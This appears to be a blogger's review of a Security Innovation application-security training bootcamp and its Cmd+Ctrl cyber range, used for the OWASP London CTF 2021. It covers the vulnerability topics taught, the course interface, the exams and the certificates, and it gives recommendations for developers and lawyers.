It was great that many courses were based on the Mitre CWE (common weakness enumeration) classifications often used in the security industry, e.g. incorrect authorization (CWE-863) and on the OWASP 2017 top 10 security risks, but I won't list them all here. The topics covered by the bootcamp: fundamentals of application security, secure software development, fundamentals of security testing, testing for execution with unnecessary privileges, testing for incorrect authorization, broken access control, broken authentication, database security fundamentals, testing for injection vulnerabilities, injection and SQL injection, testing for reliance on untrusted inputs in a security decision, testing for open redirect, security misconfiguration, cross site scripting (XSS), essential session management security, sensitive data exposure (e.g. encrypting), deserialization, use of components with known vulnerabilities, logging and monitoring and XML external entities.

Several courses were split logically into one course on the problem, and the next on mitigating it, or testing for it. Personally, I learn best by being told the point, then seeing practical concrete worked examples, and I would have liked to see more concrete examples of e.g. XSS attacks or SQL injection attacks. A couple were given occasionally, but not enough in my view. (I appreciate some examples can be found by searching online.) 

The above shows Completed but a course's status could also be displayed as being in progress. You need to click against a particular course (where it shows Completed above) to enrol in the first place, an extra step whose purpose I couldn't fathom (why not just "Start"?). The 3 dots "action menu" enables you to copy the direct link to a particular course for sharing, or pin individual courses.

Clicking on a course name takes you to a launch page, from where you can also open a PDF of the text transcription of the audio.

You can leave a course part-completed, and resume later: 

When you launch or resume a course, a video appears for playing. There are 3 icons on the top right, above the video, for a glossary (the book), help regarding how to use the video (the questionmark), and the text version of the course (printer icon). 


This course caters for people with different learning styles, by providing both videos and PDF transcriptions. Personally, I scan text a zillion times faster than if I had to watch a video linearly at the slower pace at which people speak, so for learning I much prefer text over video (plus the ability to ask questions, but I didn't see a chat icon - I don't know if that's possible with the paid version?). So, I always clicked the printer icon to read the PDF (opens in another tab) rather than watch the video.

A TOC button on the bottom right brings up a table of contents on the left, where you can click to go straight to a particular section of the video. That it also shows progress, with a tick against the sections that you've watched. 

Another positive, from an accessibility perspective: the CC (closed captions) button at the bottom right brings up the text transcript for the current part of the video, synchronised to the audio. 


The PDF didn't always show all the slides from the video, especially in the first few courses - not all the slides contained substantive content, but some slides with example URLs or code were missing from the PDF version. So, personally, I only played the videos to check for any useful slides missing from the PDFs. 

 If you play a video, it stops occasionally and you have to click the play button again to start the next section, which may not be obvious. Sometimes it stops to provide interactivity, i.e. the user has to click on one part of the slide to learn about that issue, click on another part to learn about another issue etc. I hate these types of features, myself. I would prefer videos to just play continuously, moving on from section and part to section and part, unless and until the user pauses it. Stopping a video to force the user to click on something just to get to the next portion seems popular, particularly with the periodic online staff training that many are compelled to undergo for regulatory compliance reasons, but really it's not the same as active learning, in my view! Forced stops like these just break the train of thought and get in the way, when the user wants to get a move on. But perhaps this is a matter of personal preference, so allow me my rant about "interactive" online training courses!


At the end of a video, you can take an exam (and there are also Knowledge Check quizzes to answer throughout the video). As I had scanned the PDFs rather than watch the videos, I generally went straight to the exam via the TOC or by dragging the position arrow. 

If you pass an exam, you get a certificate of completion that you can download under the Transcripts section of the site, which also allows printing of the list of courses and marks (niggle: all certificate PDFs had the same filename, it would be great if certificate filenames followed the course name, and if you could download a single zipped file of all certificates in one go). 

You're allowed to take the exam multiple times until you pass. Most exams comprise about 4-5 questions, although one had 3, a few 6-8, and another 12 questions. They estimate it takes about 5 mins per exam (10 mins sometimes), which I found was about right. 

It doesn't seem possible to go back and amend your answer if you change your mind about a previous question - when I tried that to do that in one exam, it threw a fit and I ended up having to retake the exam (with the same answers) twice before it would register as completed.


At the end of the exam, your full results are shown (it doesn't show results per question as you go through):


The obvious answer is usually the right one, and if you think "Yes, but only if..", then the answer is probably "No"! I felt a few of the questions or multiple choice answers were unclearly or ambiguously phrased. I did think some of the answers were more about categorising vulnerabilities by type, e.g. broken authentication, or more about vulnerabilities than about how to mitigate them.

If you didn't pass, you can click Review Exam to see where you went wrong, which is helpful. I only had to retake one to pass (becase of the No answer above when I had answered Yes!), but didn't bother to retake a few others where I'd passed with less than 100%.

I discovered that I actually knew more than I thought I did, so the courses didn't actually help me with Shred (although the support staff tips did). But I still learned some useful things that I didn't already know, and I strongly recommend that those without the necessary foundation should take these courses before trying the ranges.

Final thoughts

Overall, I would recommend the Cmd+Ctrl ranges as an excellent way for developers and security staff to learn about online application vulnerabilities, subject to taking the courses first for those without the prior knowledge. They really are aimed at developers/programmers, so most lawyers may struggle, even tech lawyers. I do think it's helpful for lawyers to have a basic knowledge of the common vulnerabilities and how they are exploited and mitigated when discussing cybersecurity measures and breaches with clients that have suffered incidents, but you probably don't need to tackle the courses or ranges to gain that knowledge.

Thanks very much again to SecurityInnovation for making Shred and the courses available for the OWASP London CTF 2021 event!

(I wrote this back in Dec 2021 but for various reasons couldn't publish it till now.)